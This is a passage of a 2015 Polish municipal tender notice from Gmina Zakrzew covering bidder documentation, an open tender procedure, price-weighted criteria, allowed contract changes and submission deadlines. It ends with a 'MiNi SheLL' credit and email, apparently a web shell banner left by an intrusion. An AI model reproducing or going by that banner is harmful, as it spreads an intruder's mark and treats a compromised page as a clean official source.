4. W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie    
zamówienia publicznego, dokumenty, oświadczenia potwierdzające, że Wykonawca                     nie podlega wykluczeniu w sytuacjach wskazanych w pkt 2 i 3  składa każdy  z Wykonawców   
oddzielnie. 

5.Wykonawcy powołujący się przy wykazywaniu spełniania warunków udziału                         w   postępowaniu na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne                        do  wykonania zamówienia, zdolności finansowe lub ekonomiczne  innych podmiotów, w celu umożliwienia  dokonania przez Zamawiającego oceny czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny,   czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp   do ich zasobów zobowiązani są przedłożyć:
1) w przypadku gdy Wykonawca powołuje się przy wykazywaniu spełniania warunków   udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy Pzp, na zasoby  innych podmiotów: opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający,  że podmiot ten jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę ubezpieczenia nie mniejszą niż 300 000,00 zł.
2) pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonywania zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Termin płatności za zrealizowaną usługę - 1</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa o realizację zamówienia z wyłonionym Wykonawcą zostanie zawarta na takich warunkach jakie wynikają z postanowień niniejszej specyfikacji i z załączonego do SIWZ wzoru umowy ( załącznik nr 7 do SIWZ ) z uwzględnieniem treści oferty.
2. Zamawiający dopuszcza możliwość zmiany umowy w przypadkach wskazanych  we wzorze umowy (zał. Nr 7 do SIWZ)
2.	Zamawiający dopuszcza możliwość zmiany umowy w następujących przypadkach:
1)	Zmiana przepisów prawa, w tym prawa miejscowego, wpływającej na zasady, sposób             lub zakres odbierania odpadów komunalnych. 
2)	Zmiana instalacji wskazanej w § 4 pkt 8, 
3)	Wysokość wynagrodzenia należnego  Wykonawcy, ulegnie odpowiedniej  zmianie                     w przypadku zmiany stawki podatku od towaru i usług o ile wykonawca udowodni, przedstawiając stosowne kalkulacje, iż ma to wpływ na koszty wykonywania niniejszego zamówienia przez Wykonawcę.
4)	Wysokość wynagrodzenia należnego Wykonawcy, ulegnie odpowiedniej zmianie                       w przypadku zmiany wysokości minimalnego wynagrodzenia za pracę  ustalonego                   na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę  o ile Wykonawca udowodni, przedstawiając stosowne kalkulacje, iż ma to wpływ na koszty wykonywania niniejszego zamówienia przez Wykonawcę.
5)	Wysokość wynagrodzenia należnego Wykonawcy, ulegnie odpowiedniej zmianie                      w przypadku zmiany zasad  podlegania ubezpieczeniu społecznemu lub ubezpieczeniu zdrowotnemu lub wysokości stawki na ubezpieczenie  społeczne lub zdrowotne o ile Wykonawca udowodni, przedstawiając stosowne kalkulacje, iż ma to wpływ na koszty wykonywania niniejszego zamówienia przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin/zakrzew<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Zakrzew,  Zakrzew 26, 23-155 Zakrzew..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2015 godzina 10:00, miejsce: Urząd Gminy Zakrzew,  Zakrzew 26, 23-155 Zakrzew, pokój  nr 2, punkt obsługi klienta na parterze..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com